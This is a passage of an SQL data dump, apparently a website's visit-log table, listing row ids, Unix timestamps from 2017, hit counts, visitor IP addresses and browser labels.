041,1,0,1,0,'66.249.76.108',''),(114592,1495756475,1,1,0,0,'217.182.132.70','other'),(114593,1495756559,1,1,0,0,'217.182.132.28','other'),(114594,1495756619,1,1,0,0,'217.182.132.88','other'),(114595,1495756635,1,1,0,0,'51.255.65.72','other'),(114596,1495757505,1,1,0,0,'51.255.65.17','other'),(114597,1495757527,1,1,0,0,'217.182.132.188','other'),(114598,1495757803,1,1,0,0,'164.132.161.66','other'),(114599,1495757868,1,1,0,0,'217.182.132.51','other'),(114600,1495758112,1,1,0,0,'217.182.132.62','other'),(114601,1495758190,2,2,0,0,'137.74.201.99','other'),(114602,1495758552,1,1,0,0,'51.255.65.66','other'),(114603,1495758965,1,1,0,0,'51.255.65.48','other'),(114604,1495759717,1,1,0,0,'8.29.198.25','other'),(114605,1495760132,1,1,0,0,'164.132.161.23','other'),(114606,1495760525,1,1,0,0,'54.165.59.7','other'),(114607,1495760680,1,1,0,0,'51.255.65.28','other'),(114608,1495760764,1,0,1,0,'66.249.66.158',''),(114609,1495761214,1,1,0,0,'137.74.207.102','other'),(114610,1495761451,1,1,0,0,'51.255.71.116','other'),(114611,1495761641,1,1,0,0,'217.182.132.91','other'),(114612,1495761881,1,1,0,0,'217.182.132.185','other'),(114613,1495762320,1,1,0,0,'51.255.65.56','other'),(114614,1495762452,2,0,2,0,'66.249.66.158',''),(114615,1495762459,2,0,2,0,'66.249.76.91',''),(114616,1495762525,1,0,1,0,'66.249.66.157',''),(114617,1495762867,1,1,0,0,'164.132.161.8','other'),(114618,1495763539,1,0,1,0,'66.249.76.89',''),(114619,1495763593,1,1,0,0,'51.255.65.27','other'),(114620,1495763962,1,1,0,0,'180.76.15.10','other'),(114621,1495765200,1,1,0,0,'164.132.161.15','other'),(114622,1495765759,1,1,0,0,'217.182.132.70','other'),(114623,1495766228,1,1,0,0,'164.132.161.55','other'),(114624,1495766635,1,0,1,0,'66.249.76.107',''),(114625,1495766736,1,1,0,0,'217.182.132.177','other'),(114626,1495767174,1,1,0,0,'217.182.132.54','other'),(114627,1495767178,1,1,0,0,'164.132.161.72','other'),(114628,1495767303,1,1,0,0,'66.249.76.91','chrome'),(114629,1495767650,1,1,0,0,'137.74.207.188','other'),(114630,1495767979,1,0,1,0,'66.249.76.93',''),(114631,1495768047,1,1,0,0,'217.182.132.171','other'),(114632,1495768508,1,1,0,0,'217.182.132.28','other'),(114633,1495768655,1,1,0,0,'51.255.65.18','other'),(114634,1495768660,1,1,0,0,'51.255.65.69','other'),(114635,1495768756,1,1,0,0,'157.55.39.135','other'),(114636,1495768957,1,1,0,0,'51.255.65.9','other'),(114637,1495768982,1,1,0,0,'164.132.161.59','other'),(114638,1495769469,1,1,0,0,'164.132.161.81','other'),(114639,1495769525,1,1,0,0,'217.182.132.188','other'),(114640,1495769598,1,1,0,0,'217.182.132.186','other'),(114641,1495769623,1,1,0,0,'51.255.65.62','other'),(114642,1495769902,1,0,1,0,'66.249.76.89',''),(114643,1495770273,1,1,0,0,'217.182.132.20','other'),(114644,1495770472,1,0,1,0,'66.249.76.108',''),(114645,1495770551,1,1,0,0,'8.29.198.25','other'),(114646,1495770784,1,1,0,0,'164.132.161.17','other'),(114647,1495771056,2,0,2,0,'66.249.76.89',''),(114648,1495771058,1,0,1,0,'66.249.76.91',''),(114649,1495771118,1,1,0,0,'217.182.132.67','other'),(114650,1495771136,1,1,0,0,'217.182.132.149','other'),(114651,1495771148,1,0,1,0,'66.249.66.158',''),(114652,1495771378,1,1,0,0,'217.182.132.57','other'),(114653,1495771452,1,0,1,0,'66.249.76.93',''),(114654,1495771460,1,1,0,0,'207.46.13.97','other'),(114655,1495771508,1,1,0,0,'164.132.161.4','other'),(114656,1495772122,1,1,0,0,'51.255.71.120','other'),(114657,1495772229,1,1,0,0,'217.182.132.65','other'),(114658,1495772291,1,1,0,0,'217.182.132.17','other'),(114659,1495772433,1,1,0,0,'51.255.65.89','other'),(114660,1495772448,1,1,0,0,'51.255.65.9','other'),(114661,1495772508,1,1,0,0,'217.182.132.154','other'),(114662,1495772600,1,0,1,0,'66.249.76.91',''),(114663,1495772650,1,1,0,0,'95.221.254.135','msie'),(114664,1495772948,1,1,0,0,'51.255.65.13','other'),(114665,1495773326,1,1,0,0,'217.182.132.184','other'),(114666,1495773700,1,1,0,0,'51.255.71.132','other'),(114667,1495773802,1,0,1,0,'66.249.66.156',''),(114668,1495774178,1,1,0,0,'51.255.65.5','other'),(114669,1495774408,1,0,1,0,'68.180.230.48',''),(114670,1495775309,1,1,0,0,'91.196.178.71','firefox'),(114671,1495775364,1,1,0,0,'217.182.132.25','other'),(114672,1495775665,1,1,0,0,'217.182.132.173','other'),(114673,1495775776,1,1,0,0,'91.196.178.69','firefox'),(114674,1495775930,1,0,1,0,'66.249.66.199',''),(114675,1495776088,1,1,0,0,'91.196.178.68','chrome'),(114676,1495776195,1,1,0,0,'51.255.65.30','other'),(114677,1495776405,1,1,0,0,'37.204.152.138','msie'),(114678,1495776518,1,1,0,0,'66.249.66.158','chrome'),(114679,1495777106,1,0,1,0,'66.249.66.156',''),(114680,1495777588,1,1,0,0,'51.255.65.52','other'),(114681,1495777675,1,1,0,0,'137.74.201.99','other'),(114682,1495777999,1,1,0,0,'164.132.161.77','other'),(114683,1495778681,2,0,2,0,'66.249.66.156',''),(114684,1495778828,1,0,1,0,'66.249.76.93',''),(114685,1495778829,1,0,1,0,'66.249.76.89',''),(114686,1495778862,1,0,1,0,'66.249.76.108',''),(114687,1495779080,1,1,0,0,'188.244.33.208','msie'),(114688,1495779194,1,1,0,0,'217.182.132.155','other'),(114689,1495779392,1,1,0,0,'46.242.76.106','msie'),(114690,1495779498,1,1,0,0,'51.255.71.118','other'),(114691,1495779768,1,1,0,0,'40.77.167.131','other'),(114692,1495780662,1,1,0,0,'217.182.132.62','other'),(114693,1495780670,1,1,0,0,'164.132.161.81','other'),(114694,1495780857,1,0,1,0,'66.249.76.109',''),(114695,1495780884,1,1,0,0,'217.182.132.66','other'),(114696,1495781385,1,1,0,0,'8.29.198.26','other'),(114697,1495781459,1,1,0,0,'217.182.132.188','other'),(114698,1495781740,1,1,0,0,'51.255.65.71','other'),(114699,1495782665,1,1,0,0,'217.182.132.76','other'),(114700,1495782693,1,1,0,0,'217.182.132.180','other'),(114701,1495782709,1,1,0,0,'51.255.65.60','other'),(114702,1495782855,1,1,0,0,'51.255.65.73','other'),(114703,1495782945,1,0,1,0,'66.249.76.89',''),(114704,1495782976,1,1,0,0,'194.37.248.11','msie'),(114705,1495782984,1,1,0,0,'51.255.71.114','other'),(114706,1495782994,2,0,2,0,'66.249.76.93',''),(114707,1495783096,6,6,0,0,'5.9.89.170','other'),(114708,1495783132,1,0,1,0,'66.249.76.109',''),(114709,1495783364,1,1,0,0,'217.182.132.74','other'),(114710,1495783507,1,1,0,0,'137.74.207.114','other'),(114711,1495783558,1,1,0,0,'66.249.76.107','chrome'),(114712,1495784115,1,1,0,0,'51.255.71.127','other'),(114713,1495784455,1,1,0,0,'92.112.105.1','chrome'),(114714,1495784532,1,1,0,0,'95.108.213.34','other'),(114715,1495784626,1,0,1,0,'66.249.66.157',''),(114716,1495784724,1,1,0,0,'95.135.88.207','firefox'),(114717,1495785669,1,1,0,0,'91.196.178.68','chrome'),(114718,1495785718,1,1,0,0,'51.255.65.88','other'),(114719,1495785792,1,1,0,0,'217.182.132.23','other'),(114720,1495785876,1,1,0,0,'51.255.71.110','other'),(114721,1495786113,1,1,0,0,'51.255.65.25','other'),(114722,1495786189,1,1,0,0,'51.255.65.55','other'),(114723,1495786190,1,1,0,0,'95.108.179.15','other'),(114724,1495786195,1,1,0,0,'5.255.253.81','other'),(114725,1495786324,1,1,0,0,'51.255.71.115','other'),(114726,1495786369,1,1,0,0,'91.196.178.135','firefox'),(114727,1495786532,1,1,0,0,'91.196.178.65','chrome'),(114728,1495786752,2,0,2,0,'66.249.76.91',''),(114729,1495786758,1,0,1,0,'66.249.76.89',''),(114730,1495786784,2,0,2,0,'66.249.66.156',''),(114731,1495787058,1,1,0,0,'51.255.65.5','other'),(114732,1495787085,1,0,1,0,'68.180.230.48',''),(114733,1495787159,1,1,0,0,'217.182.132.185','other'),(114734,1495787412,1,1,0,0,'217.182.132.75','other'),(114735,1495787420,1,1,0,0,'217.182.132.31','other'),(114736,1495787461,1,1,0,0,'95.135.88.207','firefox'),(114737,1495787945,1,1,0,0,'91.196.178.163','chrome'),(114738,1495788674,1,1,0,0,'164.132.161.28','other'),(114739,1495788730,1,1,0,0,'95.135.88.207','firefox'),(114740,1495788929,1,1,0,0,'51.255.65.82','other'),(114741,1495788997,1,1,0,0,'164.132.161.40','other'),(114742,1495789085,1,1,0,0,'180.76.15.151','other'),(114743,1495789267,1,1,0,0,'164.132.161.68','other'),(114744,1495789339,1,1,0,0,'164.132.161.72','other'),(114745,1495789421,1,0,1,0,'66.249.76.91',''),(114746,1495789481,1,1,0,0,'217.182.132.186','other'),(114747,1495789603,1,1,0,0,'51.255.71.127','other'),(114748,1495789866,2,2,0,0,'51.255.65.73','other'),(114749,1495790017,1,1,0,0,'164.132.161.5','other'),(114750,1495790038,1,1,0,0,'95.135.88.207','firefox'),(114751,1495790053,1,1,0,0,'89.36.217.13','firefox'),(114752,1495790592,1,0,1,0,'66.249.76.93',''),(114753,1495790801,1,1,0,0,'91.196.178.68','chrome'),(114754,1495791214,1,1,0,0,'217.69.133.13','other'),(114755,1495791249,2,2,0,0,'164.132.161.92','other'),(114756,1495791278,1,1,0,0,'91.196.178.38','chrome'),(114757,1495791560,1,1,0,0,'137.74.201.99','other'),(114758,1495791666,1,1,0,0,'95.132.24.132','firefox'),(114759,1495791714,1,1,0,0,'91.196.178.68','chrome'),(114760,1495791753,1,1,0,0,'95.135.88.207','firefox'),(114761,1495791822,1,1,0,0,'66.249.66.199','chrome'),(114763,1495791867,1,1,0,0,'217.182.132.63','other'),(114764,1495791966,1,0,1,0,'66.249.76.91',''),(114765,1495791988,1,0,1,0,'66.249.66.201',''),(114766,1495792214,1,1,0,0,'8.29.198.26','other'),(114767,1495792272,1,1,0,0,'213.179.237.185','chrome'),(114768,1495792349,1,1,0,0,'141.8.142.15','other'),(114769,1495792681,3,1,2,0,'66.249.76.91',''),(114770,1495792699,1,0,1,0,'66.249.76.108',''),(114771,1495793136,3,1,2,0,'66.249.76.89',''),(114772,1495793338,1,1,0,0,'51.255.65.49','other'),(114773,1495793417,1,0,1,0,'66.249.76.93',''),(114774,1495793456,1,0,1,0,'66.249.66.157',''),(114775,1495793712,1,0,1,0,'66.249.76.108',''),(114776,1495793801,1,1,0,0,'164.132.161.2','other'),(114777,1495794497,1,0,1,0,'66.249.66.195',''),(114778,1495794619,1,1,0,0,'164.132.161.5','other'),(114779,1495794782,1,1,0,0,'164.132.161.57','other'),(114780,1495794829,1,1,0,0,'164.132.161.38','other'),(114781,1495795585,1,1,0,0,'217.182.132.14','other'),(114782,1495796071,1,1,0,0,'207.46.13.97','other'),(114783,1495796109,1,1,0,0,'40.77.167.131','other'),(114784,1495796659,1,1,0,0,'217.182.132.177','other'),(114785,1495796901,1,0,1,0,'66.249.66.158',''),(114786,1495796904,1,0,1,0,'66.249.66.157',''),(114787,1495797268,1,0,1,0,'66.249.76.89',''),(114788,1495797521,1,1,0,0,'217.69.133.236','other'),(114789,1495797865,1,1,0,0,'78.111.186.80','chrome'),(114790,1495798104,1,0,1,0,'68.180.230.48',''),(114791,1495798352,1,0,1,0,'66.249.76.89',''),(114792,1495798387,1,0,1,0,'66.249.76.109',''),(114793,1495798635,2,2,0,0,'91.196.178.69','firefox'),(114794,1495799048,1,1,0,0,'95.132.24.132','firefox'),(114795,1495799193,1,1,0,0,'217.182.132.151','other'),(114796,1495799229,1,1,0,0,'37.53.30.219','chrome'),(114797,1495799288,1,1,0,0,'91.196.178.165','chrome'),(114798,1495799530,1,1,0,0,'164.132.161.77','other'),(114799,1495799707,1,1,0,0,'95.135.39.67','firefox'),(114800,1495799780,1,1,0,0,'176.241.106.190','chrome'),(114801,1495800101,1,1,0,0,'51.255.71.129','other'),(114802,1495800251,1,1,0,0,'178.140.62.238','msie'),(114803,1495800316,1,1,0,0,'46.48.13.161','chrome'),(114804,1495800332,1,1,0,0,'164.132.161.53','other'),(114805,1495800560,1,1,0,0,'164.132.162.159','other'),(114806,1495800746,1,1,0,0,'51.255.65.15','other'),(114807,1495800774,1,1,0,0,'188.244.45.91','chrome'),(114808,1495800775,1,1,0,0,'176.193.113.99','chrome'),(114809,1495801139,1,1,0,0,'164.132.161.3','other'),(114810,1495801402,2,0,2,0,'66.249.76.91',''),(114811,1495802089,1,1,0,0,'51.255.65.34','other'),(114812,1495802118,1,1,0,0,'37.73.235.89','chrome'),(114813,1495802146,1,1,0,0,'95.108.213.34','other'),(114814,1495802463,1,0,1,0,'66.249.76.89',''),(114815,1495803045,1,1,0,0,'8.29.198.27','other'),(114816,1495803143,1,1,0,0,'51.255.65.62','other'),(114817,1495803220,1,1,0,0,'157.55.39.135','other'),(114818,1495803649,2,2,0,0,'195.211.174.206','chrome'),(114819,1495803657,1,0,1,0,'66.249.66.158',''),(114820,1495803708,1,1,0,0,'151.80.18.30','msie'),(114821,1495804296,1,0,1,0,'66.249.76.108',''),(114822,1495804318,1,1,0,0,'51.255.65.6','other'),(114823,1495804398,1,1,0,0,'91.196.178.165','chrome'),(114824,1495804910,1,1,0,0,'217.182.132.57','other'),(114825,1495805156,1,1,0,0,'95.221.199.218','msie'),(114826,1495805157,1,1,0,0,'94.180.181.123','msie'),(114827,1495805171,1,1,0,0,'91.196.178.70','firefox'),(114828,1495805678,1,1,0,0,'164.132.162.156','other'),(114829,1495805902,1,1,0,0,'51.255.65.13','other'),(114830,1495806214,1,0,1,0,'66.249.66.158',''),(114831,1495806346,1,1,0,0,'91.196.178.65','firefox'),(114832,1495806352,1,1,0,0,'217.182.132.152','other'),(114833,1495806547,2,2,0,0,'83.149.126.98','other'),(114834,1495806817,1,1,0,0,'217.182.132.157','other'),(114835,1495807109,1,0,1,0,'68.180.230.48',''),(114836,1495807687,1,0,1,0,'66.249.66.201',''),(114837,1495807750,1,1,0,0,'91.196.178.165','chrome'),(114838,1495807967,1,1,0,0,'37.73.231.151','chrome'),(114839,1495808157,1,1,0,0,'66.249.76.108','chrome'),(114840,1495808612,1,0,1,0,'66.249.76.107',''),(114841,1495808792,1,0,1,0,'66.249.76.93',''),(114842,1495809126,1,1,0,0,'141.8.142.15','other'),(114843,1495809136,1,1,0,0,'164.132.161.84','other'),(114844,1495809487,1,1,0,0,'217.182.132.5','other'),(114845,1495811008,1,1,0,0,'176.195.179.145','msie'),(114846,1495811074,1,1,0,0,'66.249.76.108','chrome'),(114847,1495811183,1,0,1,0,'66.249.76.107',''),(114848,1495811715,1,1,0,0,'202.165.86.213','firefox'),(114849,1495812294,1,1,0,0,'51.255.65.48','other'),(114850,1495812500,1,1,0,0,'64.62.210.39','chrome'),(114851,1495812569,1,0,1,0,'66.249.76.107',''),(114852,1495813392,1,0,1,0,'66.249.76.109',''),(114853,1495813881,1,1,0,0,'8.29.198.25','other'),(114854,1495814065,2,2,0,0,'217.182.132.183','other'),(114855,1495814150,1,1,0,0,'164.132.161.34','other'),(114856,1495816519,1,1,0,0,'51.255.65.48','other'),(114857,1495816801,1,0,1,0,'66.249.66.195',''),(114858,1495816822,1,0,1,0,'66.249.76.91',''),(114859,1495816833,1,1,0,0,'217.182.132.87','other'),(114860,1495817176,2,1,1,0,'66.249.76.107',''),(114861,1495817238,1,1,0,0,'157.55.39.135','other'),(114862,1495817265,1,0,1,0,'66.249.66.158',''),(114863,1495817838,1,1,0,0,'217.182.132.63','other'),(114864,1495817955,1,1,0,0,'217.182.132.147','other'),(114865,1495818654,1,1,0,0,'66.249.66.157','chrome'),(114866,1495818749,1,1,0,0,'164.132.161.60','other'),(114867,1495819200,1,1,0,0,'82.145.222.160','other'),(114868,1495819508,1,1,0,0,'217.182.132.70','other'),(114869,1495819685,1,1,0,0,'66.249.76.109','chrome'),(114870,1495819727,1,0,1,0,'66.249.76.108',''),(114871,1495819765,2,0,2,0,'66.249.66.157',''),(114872,1495819777,1,0,1,0,'66.249.76.89',''),(114873,1495820006,1,1,0,0,'207.46.13.97','other'),(114874,1495820670,1,1,0,0,'164.132.161.72','other'),(114875,1495820989,1,1,0,0,'217.182.132.184','other'),(114876,1495821780,1,1,0,0,'51.255.65.25','other'),(114877,1495821792,1,0,1,0,'66.249.76.89',''),(114878,1495822514,1,1,0,0,'217.182.132.178','other'),(114879,1495822657,1,1,0,0,'137.74.207.110','other'),(114880,1495822695,1,1,0,0,'51.255.71.129','other'),(114881,1495822901,1,1,0,0,'164.132.161.95','other'),(114882,1495823117,2,2,0,0,'91.209.11.236','other'),(114883,1495823236,1,1,0,0,'95.108.179.15','other'),(114884,1495824191,1,1,0,0,'217.182.132.77','other'),(114885,1495824260,1,1,0,0,'164.132.161.65','other'),(114886,1495824589,1,1,0,0,'164.132.161.90','other'),(114887,1495824715,1,1,0,0,'8.29.198.25','other'),(114888,1495826361,1,1,0,0,'180.76.15.149','other'),(114889,1495826387,1,0,1,0,'66.249.66.201',''),(114890,1495827248,1,1,0,0,'91.196.178.33','chrome'),(114891,1495828287,1,0,1,0,'66.249.76.107',''),(114892,1495828390,1,0,1,0,'66.249.76.91',''),(114893,1495828473,1,0,1,0,'66.249.76.109',''),(114894,1495829298,1,0,1,0,'66.249.76.91',''),(114895,1495829343,1,1,0,0,'94.254.240.54','chrome'),(114896,1495830545,2,0,2,0,'66.249.66.156',''),(114897,1495830733,1,0,1,0,'66.249.76.109',''),(114898,1495831609,1,1,0,0,'66.102.9.35','chrome'),(114899,1495832014,1,0,1,0,'66.249.66.74',''),(114900,1495832291,1,0,1,0,'66.249.76.108',''),(114901,1495832432,1,0,1,0,'66.249.66.75',''),(114902,1495834472,1,0,1,0,'66.249.76.107',''),(114903,1495835215,1,0,1,0,'68.180.230.48',''),(114904,1495835544,1,1,0,0,'8.29.198.26','other'),(114905,1495835856,2,0,2,0,'66.249.76.109',''),(114906,1495836414,1,1,0,0,'40.77.167.131','other'),(114907,1495836604,1,1,0,0,'164.132.161.68','other'),(114908,1495836989,1,1,0,0,'164.132.161.66','other'),(114909,1495837411,1,1,0,0,'217.182.132.58','other'),(114910,1495838205,1,1,0,0,'157.55.39.152','other'),(114911,1495838513,1,1,0,0,'157.55.39.135','other'),(114912,1495838560,1,0,1,0,'66.249.76.108',''),(114913,1495838778,1,1,0,0,'217.182.132.173','other'),(114914,1495839959,1,1,0,0,'217.182.132.25','other'),(114915,1495840240,1,1,0,0,'51.255.71.120','other'),(114916,1495840405,1,0,1,0,'66.249.66.75',''),(114917,1495840499,1,0,1,0,'66.249.76.108',''),(114918,1495840606,1,1,0,0,'157.55.39.135','other'),(114919,1495840677,1,0,1,0,'66.249.76.89',''),(114920,1495840960,1,1,0,0,'66.249.76.109','chrome'),(114921,1495841679,1,0,1,0,'66.249.66.74',''),(114922,1495841916,1,1,0,0,'95.108.213.34','other'),(114923,1495841922,1,1,0,0,'87.250.224.7','other'),(114924,1495842176,1,1,0,0,'95.108.179.15','other'),(114925,1495842551,1,1,0,0,'51.255.65.35','other'),(114926,1495842603,1,1,0,0,'141.8.142.154','other'),(114927,1495843173,1,1,0,0,'217.182.132.63','other'),(114928,1495843271,1,1,0,0,'164.132.161.65','other'),(114929,1495843694,1,1,0,0,'51.255.65.38','other'),(114930,1495844154,1,1,0,0,'95.108.179.15','other'),(114931,1495844176,1,1,0,0,'95.108.213.34','other'),(114932,1495844212,1,1,0,0,'217.182.132.80','other'),(114933,1495844641,1,1,0,0,'66.249.66.74','chrome'),(114934,1495844657,1,1,0,0,'66.249.66.157','chrome'),(114935,1495844853,1,0,1,0,'66.249.76.93',''),(114936,1495844966,1,1,0,0,'51.255.65.47','other'),(114937,1495844993,6,6,0,0,'91.121.86.136','other'),(114938,1495845055,1,1,0,0,'217.182.132.184','other'),(114939,1495845135,1,1,0,0,'51.255.64.106','other'),(114940,1495845495,1,1,0,0,'217.182.132.157','other'),(114941,1495845642,1,1,0,0,'217.182.132.73','other'),(114942,1495845856,1,1,0,0,'51.255.65.21','other'),(114943,1495846371,1,1,0,0,'8.29.198.27','other'),(114944,1495847076,1,1,0,0,'164.132.161.69','other'),(114945,1495847344,1,1,0,0,'217.182.132.16','other'),(114946,1495847529,1,1,0,0,'164.132.161.20','other'),(114947,1495847555,1,1,0,0,'95.108.213.34','other'),(114948,1495847665,1,0,1,0,'66.249.76.107',''),(114949,1495847951,1,1,0,0,'164.132.161.4','other'),(114950,1495848138,1,1,0,0,'51.255.71.128','other'),(114951,1495848284,1,1,0,0,'217.182.132.182','other'),(114952,1495848512,1,1,0,0,'95.108.179.15','other'),(114953,1495848532,2,2,0,0,'95.108.213.34','other'),(114954,1495849463,1,1,0,0,'164.132.161.93','other'),(114955,1495849604,1,1,0,0,'87.250.224.7','other'),(114956,1495849643,7,7,0,0,'141.8.142.15','other'),(114957,1495849666,2,2,0,0,'93.158.152.79','other'),(114958,1495849688,7,7,0,0,'95.108.213.34','other'),(114959,1495849845,3,3,0,0,'95.108.179.15','other'),(114960,1495849859,4,4,0,0,'87.250.224.18','other'),(114961,1495849953,7,7,0,0,'141.8.142.154','other'),(114962,1495850079,1,0,1,0,'66.249.76.107',''),(114963,1495850130,1,1,0,0,'51.255.65.91','other'),(114964,1495850228,1,1,0,0,'51.255.71.131','other'),(114965,1495850274,4,4,0,0,'141.8.142.164','other'),(114966,1495850321,1,1,0,0,'51.255.65.3','other'),(114967,1495850420,3,3,0,0,'178.154.200.37','other'),(114968,1495850480,2,2,0,0,'95.108.181.13','other'),(114969,1495850487,2,2,0,0,'87.250.224.8','other'),(114970,1495850636,5,5,0,0,'5.255.253.58','other'),(114971,1495850639,3,3,0,0,'178.154.149.1','other'),(114972,1495850641,4,4,0,0,'5.255.253.63','other'),(114973,1495850647,3,3,0,0,'95.108.213.7','other'),(114974,1495850655,4,4,0,0,'178.154.189.3','other'),(114975,1495850665,2,2,0,0,'141.8.142.97','other'),(114976,1495850684,1,1,0,0,'37.9.113.38','other'),(114977,1495850687,1,1,0,0,'37.9.113.43','other'),(114978,1495850689,4,4,0,0,'87.250.224.7','other'),(114979,1495850692,1,1,0,0,'87.250.224.16','other'),(114980,1495850700,1,1,0,0,'141.8.142.42','other'),(114981,1495850703,1,1,0,0,'178.154.149.3','other'),(114982,1495850705,1,1,0,0,'5.255.253.81','other'),(114983,1495850715,1,1,0,0,'141.8.132.43','other'),(114984,1495850718,1,1,0,0,'141.8.132.25','other'),(114985,1495850723,3,3,0,0,'95.108.213.8','other'),(114986,1495850735,3,3,0,0,'141.8.142.38','other'),(114987,1495850737,2,2,0,0,'95.108.213.34','other'),(114988,1495850744,1,1,0,0,'178.154.200.45','other'),(114989,1495850747,4,4,0,0,'95.108.179.15','other'),(114990,1495850778,5,5,0,0,'141.8.142.15','other'),(114991,1495850880,1,1,0,0,'51.255.65.75','other'),(114992,1495851599,1,1,0,0,'217.182.132.19','other'),(114993,1495851726,1,1,0,0,'217.182.132.190','other'),(114994,1495852133,1,1,0,0,'164.132.162.164','other'),(114995,1495852496,1,0,1,0,'66.249.66.155',''),(114996,1495852693,2,0,2,0,'66.249.76.91',''),(114997,1495852896,1,0,1,0,'66.249.76.93',''),(114998,1495852909,1,0,1,0,'66.249.66.75',''),(114999,1495852915,2,0,2,0,'66.249.76.89',''),(115000,1495852989,1,1,0,0,'217.182.132.174','other'),(115001,1495853565,1,1,0,0,'164.132.161.3','other'),(115002,1495855714,9,9,0,0,'173.208.169.26','other'),(115004,1495855958,1,1,0,0,'217.182.132.31','other'),(115005,1495856235,1,1,0,0,'178.154.200.2','other'),(115006,1495856251,2,2,0,0,'95.108.179.15','other'),(115007,1495856397,1,1,0,0,'51.255.71.132','other'),(115008,1495856607,2,0,2,0,'66.249.76.109',''),(115009,1495856739,1,1,0,0,'207.46.13.97','other'),(115010,1495856824,1,1,0,0,'217.69.133.239','other'),(115011,1495856897,1,1,0,0,'51.255.65.2','other'),(115012,1495856950,1,1,0,0,'157.55.39.152','other'),(115013,1495857147,7,7,0,0,'95.108.213.34','other'),(115014,1495857152,3,3,0,0,'95.108.179.15','other'),(115015,1495857158,6,6,0,0,'141.8.142.15','other'),(115016,1495857204,1,1,0,0,'8.29.198.25','other'),(115017,1495857451,1,1,0,0,'217.69.133.6','other'),(115018,1495857683,1,1,0,0,'51.255.65.41','other'),(115019,1495858606,1,1,0,0,'164.132.161.28','other'),(115020,1495858629,1,1,0,0,'180.76.15.149','other'),(115021,1495858709,1,0,1,0,'66.249.76.91',''),(115022,1495858725,1,0,1,0,'66.249.76.109',''),(115023,1495859097,1,1,0,0,'51.255.65.31','other'),(115024,1495859288,1,1,0,0,'217.182.132.153','other'),(115025,1495860321,1,1,0,0,'91.209.11.236','other'),(115026,1495861334,1,1,0,0,'164.132.161.90','other'),(115027,1495861380,1,1,0,0,'51.255.65.74','other'),(115028,1495861397,1,1,0,0,'109.86.72.163','chrome'),(115029,1495861749,1,1,0,0,'51.255.65.71','other'),(115030,1495861953,3,3,0,0,'91.209.11.236','other'),(115031,1495862532,1,1,0,0,'217.182.132.150','other'),(115032,1495862587,1,1,0,0,'164.132.161.16','other'),(115033,1495863143,1,1,0,0,'51.255.65.80','other'),(115034,1495863332,1,1,0,0,'94.178.147.141','chrome'),(115035,1495863481,1,1,0,0,'51.255.71.133','other'),(115036,1495863738,1,1,0,0,'51.255.65.40','other'),(115037,1495863811,1,0,1,0,'66.249.76.109',''),(115038,1495863966,1,0,1,0,'66.249.66.75',''),(115039,1495863971,1,0,1,0,'66.249.76.89',''),(115040,1495864184,1,1,0,0,'51.255.65.82','other'),(115041,1495864339,1,1,0,0,'51.255.65.31','other'),(115042,1495864374,1,0,1,0,'66.249.66.76',''),(115043,1495864389,1,1,0,0,'217.182.132.177','other'),(115044,1495864694,1,1,0,0,'157.55.39.152','other'),(115045,1495864696,2,2,0,0,'91.209.11.236','other'),(115046,1495865114,1,1,0,0,'51.255.71.131','other'),(115047,1495865375,1,1,0,0,'164.132.161.50','other'),(115048,1495865907,1,1,0,0,'66.249.76.109','chrome'),(115049,1495866181,1,1,0,0,'164.132.161.53','other'),(115050,1495866711,2,0,2,0,'66.249.66.75',''),(115051,1495866715,1,1,0,0,'164.132.161.63','other'),(115052,1495866729,1,0,1,0,'66.249.76.108',''),(115053,1495866735,1,0,1,0,'66.249.76.93',''),(115054,1495866802,4,4,0,0,'173.212.230.140','other'),(115055,1495866814,1,1,0,0,'51.255.65.24','other'),(115056,1495867401,1,0,1,0,'66.249.76.107',''),(115057,1495867671,1,1,0,0,'66.102.9.29','chrome'),(115058,1495868034,1,1,0,0,'8.29.198.27','other'),(115059,1495868295,1,1,0,0,'217.182.132.146','other'),(115060,1495869324,1,1,0,0,'207.46.13.97','other'),(115061,1495869386,1,1,0,0,'217.182.132.183','other'),(115062,1495869719,1,1,0,0,'51.255.71.120','other'),(115063,1495870528,1,1,0,0,'137.74.207.110','other'),(115064,1495870531,1,1,0,0,'91.209.11.236','other'),(115065,1495871099,1,1,0,0,'46.211.102.54','chrome'),(115066,1495871396,1,1,0,0,'164.132.161.26','other'),(115067,1495871403,1,1,0,0,'207.46.13.97','other'),(115068,1495871636,2,0,2,0,'66.249.76.89',''),(115069,1495872265,1,1,0,0,'164.132.161.37','other'),(115070,1495872367,1,1,0,0,'217.182.132.150','other'),(115071,1495872387,1,0,1,0,'66.249.76.108',''),(115072,1495872414,1,1,0,0,'51.255.65.66','other'),(115073,1495872966,1,1,0,0,'217.182.132.70','other'),(115074,1495873242,1,1,0,0,'51.255.65.39','other'),(115075,1495873348,1,0,1,0,'66.249.66.75',''),(115076,1495873546,1,0,1,0,'66.249.76.108',''),(115077,1495873724,1,0,1,0,'66.249.66.74',''),(115078,1495873754,1,0,1,0,'66.249.76.93',''),(115079,1495874076,1,1,0,0,'91.209.11.236','other'),(115080,1495874155,1,0,1,0,'66.249.66.76',''),(115081,1495875776,1,1,0,0,'66.249.66.76','chrome'),(115082,1495876066,1,0,1,0,'66.249.76.108',''),(115083,1495876385,1,0,1,0,'66.249.66.156',''),(115084,1495876812,1,0,1,0,'66.249.76.89',''),(115085,1495876903,1,0,1,0,'66.249.66.74',''),(115086,1495876958,1,1,0,0,'66.249.76.93','chrome'),(115087,1495876965,1,1,0,0,'66.249.66.156','chrome'),(115088,1495877397,1,1,0,0,'40.77.167.131','other'),(115089,1495877648,1,1,0,0,'66.249.76.109','chrome'),(115090,1495877711,1,1,0,0,'217.182.132.183','other'),(115091,1495877888,1,1,0,0,'164.132.161.83','other'),(115092,1495878012,1,1,0,0,'137.74.207.108','other'),(115093,1495878398,1,1,0,0,'157.55.39.71','other'),(115094,1495878493,1,1,0,0,'217.182.132.61','other'),(115095,1495878553,1,1,0,0,'164.132.161.56','other'),(115096,1495878856,1,1,0,0,'217.182.132.29','other'),(115097,1495878868,1,1,0,0,'8.29.198.25','other'),(115098,1495878940,1,1,0,0,'51.255.65.35','other'),(115099,1495879676,1,0,1,0,'66.249.66.157',''),(115100,1495879878,2,2,0,0,'208.110.93.52','other'),(115101,1495880415,1,0,1,0,'66.249.76.91',''),(115102,1495882070,1,1,0,0,'193.194.127.217','firefox'),(115103,1495882803,2,2,0,0,'91.209.11.236','other'),(115104,1495883485,1,0,1,0,'68.180.231.23',''),(115105,1495883661,1,0,1,0,'66.249.76.91',''),(115106,1495884037,1,0,1,0,'66.249.66.156',''),(115107,1495884597,1,0,1,0,'66.249.76.109',''),(115108,1495884903,2,2,0,0,'91.209.11.236','other'),(115109,1495885604,1,1,0,0,'94.178.147.141','chrome'),(